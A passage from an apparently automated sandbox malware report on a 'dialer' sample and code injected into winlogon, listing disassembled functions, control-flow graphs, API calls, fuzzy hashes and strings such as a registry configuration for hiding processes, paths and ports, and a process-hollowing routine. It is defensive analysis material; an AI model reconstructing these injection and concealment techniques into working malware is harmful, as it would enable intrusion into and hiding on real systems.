                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                      • String ID:
                                                                      • API String ID: 3676546796-0
                                                                      • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                      • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                                      • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                      • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                                                                      Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 172 1400018ac-1400018d6 OpenProcess 173 140001901-140001912 172->173 174 1400018d8-1400018e8 IsWow64Process 172->174 175 1400018f8-1400018fb CloseHandle 174->175 176 1400018ea-1400018f3 174->176 175->173 176->175
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseHandleOpenWow64
                                                                      • String ID:
                                                                      • API String ID: 10462204-0
                                                                      • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                      • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                                      • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                      • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                                                                      Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 177 140002258-14000225c call 14000226c 179 140002261-140002263 ExitProcess 177->179
                                                                      APIs
                                                                        • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                        • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                        • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                        • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                        • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                        • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                        • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                        • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                                        • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                        • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                        • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                        • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                        • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                        • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                        • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                        • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                                      • ExitProcess.KERNEL32 ref: 0000000140002263
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                                      • String ID:
                                                                      • API String ID: 3836936051-0
                                                                      • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                      • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                                      • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                      • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                                      Non-executed Functions

                                                                      Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 184 140002560-14000258c 185 140002592 184->185 186 14000273a-140002742 184->186 187 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 185->187 188 140002598-14000259f 185->188 189 140002748-14000274b 186->189 190 14000297e-1400029a2 ReadFile 186->190 191 140002a74-140002a8e 187->191 193 140002704-140002715 187->193 194 1400025a5-1400025a8 188->194 195 1400026bd-1400026bf ExitProcess 188->195 196 140002751-140002756 189->196 197 140002974-140002979 call 14000175c 189->197 190->191 192 1400029a8-1400029af 190->192 192->191 201 1400029b5-1400029c9 call 1400018ac 192->201 193->191 202 14000271b-140002733 call 1400010c0 193->202 203 1400025ae-1400025b1 194->203 204 140002660-14000268b RegOpenKeyExW 194->204 198 140002919-14000292c call 140001944 196->198 199 14000275c-14000275f 196->199 197->191 198->191 226 140002932-140002941 call 140001944 198->226 205 140002761-140002766 199->205 206 14000279d-1400027ae call 140001944 199->206 201->191 224 1400029cf-1400029d5 201->224 227 140002735 202->227 213 140002651-14000265b 203->213 214 1400025b7-1400025ba 203->214 211 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 204->211 212 14000268d-14000269b RegDeleteValueW 204->212 205->191 215 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 205->215 206->191 235 1400027b4-1400027d6 ReadFile 206->235 211->191 212->211 213->191 221 140002644-14000264c 214->221 222 1400025c0-1400025c5 214->222 221->191 222->191 229 1400025cb-1400025ef ReadFile 222->229 233 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 224->233 234 140002a5f 224->234 226->191 250 140002947-14000296f ShellExecuteW 226->250 227->191 229->191 231 1400025f5-1400025fc 229->231 231->191 238 140002602-140002616 call 1400018ac 231->238 253 140002a18-140002a1e 233->253 254 140002a49-140002a4f GetProcessHeap 233->254 240 140002a66-140002a6f call 140002a90 234->240 235->191 242 1400027dc-1400027e3 235->242 238->191 259 14000261c-140002622 238->259 240->191 242->191 249 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 242->249 255 14000290b-140002914 GetProcessHeap 249->255 256 14000282d-140002839 249->256 250->191 253->254 260 140002a20-140002a32 253->260 257 140002a52-140002a5d HeapFree 254->257 255->257 256->255 261 14000283f-14000284b 256->261 257->191 263 140002624-140002633 call 1400010c0 259->263 264 140002638-14000263f 259->264 265 140002a34-140002a36 260->265 266 140002a38-140002a40 260->266 261->255 267 140002851-14000285c 261->267 263->191 264->240 265->266 271 140002a44 call 1400016cc 265->271 266->254 272 140002a42 266->272 268 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 267->268 269 14000285e-140002869 267->269 268->255 269->255 273 14000286f-14000287c call 140001c88 269->273 271->254 272->260 273->255
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                                      • String ID: SOFTWARE$dialerstager$open
                                                                      • API String ID: 3276259517-3931493855
                                                                      • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                      • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                                      • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                      • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                                                                      Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 280 140001c88-140001cb8 281 140001cbb-140001cc8 280->281 282 140001e8c-140001e91 281->282 283 140001cce-140001d25 CreateProcessW 281->283 282->281 286 140001e97 282->286 284 140001e88 283->284 285 140001d2b-140001d5a VirtualAllocEx 283->285 284->282 287 140001e5d-140001e60 285->287 288 140001d60-140001d7b WriteProcessMemory 285->288 289 140001e99-140001eb9 286->289 290 140001e62-140001e76 OpenProcess 287->290 291 140001e85 287->291 288->287 292 140001d81-140001d87 288->292 290->284 293 140001e78-140001e83 TerminateProcess 290->293 291->284 294 140001dd2-140001def VirtualAlloc 292->294 295 140001d89 292->295 293->284 294->287 296 140001df1-140001e07 GetThreadContext 294->296 297 140001d8c-140001dba WriteProcessMemory 295->297 296->287 299 140001e09-140001e2e WriteProcessMemory 296->299 297->287 298 140001dc0-140001dcc 297->298 298->297 300 140001dce 298->300 299->287 301 140001e30-140001e4c SetThreadContext 299->301 300->294 301->287 302 140001e4e-140001e5b ResumeThread 301->302 302->287 303 140001eba-140001ebf 302->303 303->289
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                      • String ID: @
                                                                      • API String ID: 3462610200-2766056989
                                                                      • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                      • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                                      • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                      • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                                      Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                      • String ID: dialersvc64
                                                                      • API String ID: 4184240511-3881820561
                                                                      • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                      • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                                      • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                      • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                                      Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Delete$CloseEnumOpen
                                                                      • String ID: SOFTWARE\dialerconfig
                                                                      • API String ID: 3013565938-461861421
                                                                      • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                      • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                                      • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                      • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                                      Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: File$Write$CloseCreateHandle
                                                                      • String ID: \\.\pipe\dialercontrol_redirect64
                                                                      • API String ID: 148219782-3440882674
                                                                      • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                      • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                                      • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                      • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                                      Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: ntdll.dll
                                                                      • API String ID: 1646373207-2227199552
                                                                      • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                      • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                                      • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                      • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                                      Execution Graph

                                                                      Execution Coverage:1.3%
                                                                      Dynamic/Decrypted Code Coverage:94.1%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:101
                                                                      Total number of Limit Nodes:16
                                                                      execution_graph 22024 1f385b9273c 22026 1f385b9276a 22024->22026 22025 1f385b928d4 22026->22025 22027 1f385b927c5 VirtualAlloc 22026->22027 22027->22025 22028 1f385b927ec 22027->22028 22028->22025 22029 1f385b92858 LoadLibraryA 22028->22029 22029->22028 22030 1f385bc5cf0 22031 1f385bc5cfd 22030->22031 22032 1f385bc5d09 22031->22032 22035 1f385bc5e1a 22031->22035 22033 1f385bc5d3e 22032->22033 22034 1f385bc5d8d 22032->22034 22036 1f385bc5d66 SetThreadContext 22033->22036 22037 1f385bc5e41 VirtualProtect FlushInstructionCache 22035->22037 22038 1f385bc5efe 22035->22038 22036->22034 22037->22035 22039 1f385bc5f1e 22038->22039 22052 1f385bc43e0 VirtualFree 22038->22052 22048 1f385bc4df0 GetCurrentProcess 22039->22048 22042 1f385bc5f23 22043 1f385bc5f77 22042->22043 22044 1f385bc5f37 ResumeThread 22042->22044 22053 1f385bc7940 IsProcessorFeaturePresent RtlLookupFunctionEntry capture_previous_context 22043->22053 22045 1f385bc5f6b 22044->22045 22045->22042 22047 1f385bc5fbf 22049 1f385bc4e0c 22048->22049 22050 1f385bc4e22 VirtualProtect FlushInstructionCache 22049->22050 22051 1f385bc4e53 22049->22051 22050->22049 22051->22042 22052->22039 22053->22047 22054 1f385bc1abc 22059 1f385bc1628 GetProcessHeap HeapAlloc 22054->22059 22056 1f385bc1ad2 Sleep SleepEx 22057 1f385bc1acb 22056->22057 22057->22056 22058 1f385bc1598 StrCmpIW StrCmpW 22057->22058 22058->22057 22103 1f385bc1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22059->22103 22061 1f385bc1650 22104 1f385bc1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22061->22104 22063 1f385bc1661 22105 1f385bc1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22063->22105 22065 1f385bc166a 22106 1f385bc1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22065->22106 22067 1f385bc1673 22068 1f385bc168e RegOpenKeyExW 22067->22068 22069 1f385bc16c0 RegOpenKeyExW 22068->22069 22070 1f385bc18a6 22068->22070 22071 1f385bc16ff RegOpenKeyExW 22069->22071 22072 1f385bc16e9 22069->22072 22070->22057 22074 1f385bc173a RegOpenKeyExW 22071->22074 22075 1f385bc1723 22071->22075 22113 1f385bc12bc 16 API calls 22072->22113 22076 1f385bc175e 22074->22076 22077 1f385bc1775 RegOpenKeyExW 22074->22077 22107 1f385bc104c RegQueryInfoKeyW 22075->22107 22114 1f385bc12bc 16 API calls 22076->22114 22082 1f385bc17b0 RegOpenKeyExW 22077->22082 22083 1f385bc1799 22077->22083 22078 1f385bc16f5 RegCloseKey 22078->22071 22086 1f385bc17eb RegOpenKeyExW 22082->22086 22087 1f385bc17d4 22082->22087 22115 1f385bc12bc 16 API calls 22083->22115 22084 1f385bc176b RegCloseKey 22084->22077 22090 1f385bc180f 22086->22090 22091 1f385bc1826 RegOpenKeyExW 22086->22091 22116 1f385bc12bc 16 API calls 22087->22116 22088 1f385bc17a6 RegCloseKey 22088->22082 22095 1f385bc104c 6 API calls 22090->22095 22092 1f385bc1861 RegOpenKeyExW 22091->22092 22093 1f385bc184a 22091->22093 22098 1f385bc189c RegCloseKey 22092->22098 22099 1f385bc1885 22092->22099 22097 1f385bc104c 6 API calls 22093->22097 22094 1f385bc17e1 RegCloseKey 22094->22086 22096 1f385bc181c RegCloseKey 22095->22096 22096->22091 22100 1f385bc1857 RegCloseKey 22097->22100 22098->22070 22101 1f385bc104c 6 API calls 22099->22101 22100->22092 22102 1f385bc1892 RegCloseKey 22101->22102 22102->22098 22103->22061 22104->22063 22105->22065 22106->22067 22108 1f385bc10bf 22107->22108 22109 1f385bc11b5 RegCloseKey 22107->22109 22108->22109 22110 1f385bc10cf RegEnumValueW 22108->22110 22109->22074 22111 1f385bc1125 22110->22111 22111->22109 22111->22110 22112 1f385bc114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 22111->22112 22112->22111 22113->22078 22114->22084 22115->22088 22116->22094 22117 1f385bc554d 22118 1f385bc5554 22117->22118 22119 1f385bc55bb 22118->22119 22120 1f385bc5637 VirtualProtect 22118->22120 22121 1f385bc5671 22120->22121 22122 1f385bc5663 GetLastError 22120->22122 22122->22121 22123 1f385bf273c 22124 1f385bf276a 22123->22124 22125 1f385bf27c5 VirtualAlloc 22124->22125 22126 1f385bf27ec 22124->22126 22125->22126 22127 1f385bc28c8 22129 1f385bc290e 22127->22129 22128 1f385bc2970 22129->22128 22131 1f385bc3844 22129->22131 22132 1f385bc3851 StrCmpNIW 22131->22132 22133 1f385bc3866 22131->22133 22132->22133 22133->22129 22134 1f385bc3ab9 22135 1f385bc3a06 22134->22135 22136 1f385bc3a56 VirtualQuery 22135->22136 22137 1f385bc3a70 22135->22137 22138 1f385bc3a8a VirtualAlloc 22135->22138 22136->22135 22136->22137 22138->22137 22139 1f385bc3abb GetLastError 22138->22139 22139->22135

                                                                      Executed Functions

                                                                      Function 000001F385BC1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                      • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                      • API String ID: 106492572-2879589442
                                                                      • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                      • Instruction ID: 5a9fcc6cd55dee6a316c52f2010dba24f70424c837c5cf46fdf9dedb95e6d04b
                                                                      • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                      • Instruction Fuzzy Hash: D8712A36710A1286EB919F21E8906E92364F7E4BE8F405231FE5E57BACDE3CCA44C344
                                                                      Function 000001F385BC3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                      • String ID: wr
                                                                      • API String ID: 1092925422-2678910430
                                                                      • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction ID: ea3d30c06083b22014454e8c8fffd79e95962deda3e2360bae8acdd5a724b91a
                                                                      • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction Fuzzy Hash: 99113C36704B4282EF959F11E4046B962A0F798BE5F840239EEA9077D8EF3DCA05C708
                                                                      Function 000001F385BC5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 57 1f385bc5b30-1f385bc5b57 58 1f385bc5b6b-1f385bc5b76 GetCurrentThreadId 57->58 59 1f385bc5b59-1f385bc5b68 57->59 60 1f385bc5b82-1f385bc5b89 58->60 61 1f385bc5b78-1f385bc5b7d 58->61 59->58 63 1f385bc5b9b-1f385bc5baf 60->63 64 1f385bc5b8b-1f385bc5b96 call 1f385bc5960 60->64 62 1f385bc5faf-1f385bc5fc6 call 1f385bc7940 61->62 67 1f385bc5bbe-1f385bc5bc4 63->67 64->62 70 1f385bc5bca-1f385bc5bd3 67->70 71 1f385bc5c95-1f385bc5cb6 67->71 73 1f385bc5c1a-1f385bc5c8d call 1f385bc4510 call 1f385bc44b0 call 1f385bc4470 70->73 74 1f385bc5bd5-1f385bc5c18 call 1f385bc85c0 70->74 76 1f385bc5e1f-1f385bc5e30 call 1f385bc74bf 71->76 77 1f385bc5cbc-1f385bc5cdc GetThreadContext 71->77 87 1f385bc5c90 73->87 74->87 91 1f385bc5e35-1f385bc5e3b 76->91 80 1f385bc5ce2-1f385bc5d03 77->80 81 1f385bc5e1a 77->81 80->81 90 1f385bc5d09-1f385bc5d12 80->90 81->76 87->67 95 1f385bc5d92-1f385bc5da3 90->95 96 1f385bc5d14-1f385bc5d25 90->96 92 1f385bc5e41-1f385bc5e98 VirtualProtect FlushInstructionCache 91->92 93 1f385bc5efe-1f385bc5f0e 91->93 97 1f385bc5ec9-1f385bc5ef9 call 1f385bc78ac 92->97 98 1f385bc5e9a-1f385bc5ea4 92->98 102 1f385bc5f10-1f385bc5f17 93->102 103 1f385bc5f1e-1f385bc5f2a call 1f385bc4df0 93->103 99 1f385bc5e15 95->99 100 1f385bc5da5-1f385bc5dc3 95->100 104 1f385bc5d8d 96->104 105 1f385bc5d27-1f385bc5d3c 96->105 97->91 98->97 106 1f385bc5ea6-1f385bc5ec1 call 1f385bc4390 98->106 100->99 107 1f385bc5dc5-1f385bc5e10 call 1f385bc3900 call 1f385bc74dd 100->107 102->103 109 1f385bc5f19 call 1f385bc43e0 102->109 121 1f385bc5f2f-1f385bc5f35 103->121 104->99 105->104 111 1f385bc5d3e-1f385bc5d88 call 1f385bc3970 SetThreadContext 105->111 106->97 107->99 109->103 111->104 122 1f385bc5f77-1f385bc5f95 121->122 123 1f385bc5f37-1f385bc5f75 ResumeThread call 1f385bc78ac 121->123 126 1f385bc5f97-1f385bc5fa6 122->126 127 1f385bc5fa9 122->127 123->121 126->127 127->62
                                                                      APIs
                                                                      Memory Dump Source
